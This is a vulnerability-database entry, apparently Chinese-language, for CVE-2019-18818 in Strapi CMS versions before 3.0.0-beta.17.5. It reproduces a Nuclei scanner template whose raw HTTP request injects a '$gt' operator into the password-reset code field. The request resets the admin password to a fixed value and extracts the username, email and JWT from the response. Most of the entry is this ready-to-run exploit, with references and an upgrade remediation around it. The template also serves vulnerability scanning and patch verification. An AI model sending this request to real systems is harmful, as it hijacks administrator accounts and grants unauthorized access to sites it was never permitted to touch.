CVE-2019-18818: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset

日期: 2025-08-01 | 影响软件: strapi CMS | POC: 已公开

漏洞描述

strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.

PoC代码[已公开]

id: CVE-2019-18818

info:
  name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
  author: idealphase
  severity: critical
  description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
  impact: |
    An attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel.
  remediation: |
    Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability.
  reference:
    - https://github.com/advisories/GHSA-6xc2-mj39-q599
    - https://www.exploit-db.com/exploits/50239
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18818
    - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5
    - https://github.com/strapi/strapi/pull/4443
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18818
    cwe-id: CWE-640
    epss-score: 0.94006
    epss-percentile: 0.99887
    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: strapi
    product: strapi
  tags: cve,cve2019,strapi,auth-bypass,intrusive,edb

http:
  - raw:
      - |
        POST /admin/auth/reset-password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/json

        {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - '"username":'
          - '"email":'
          - '"jwt":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        json:
          - .user.username
          - .user.email
# digest: 4a0a0047304502205c4dab062c662dadabb13ec9332e7e4de976696336be0bb1eebe1b4e159c3081022100a050429c59ce81208f96fa6a748688b8f41812673379a88981e237f7a36a53ca:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18818.yaml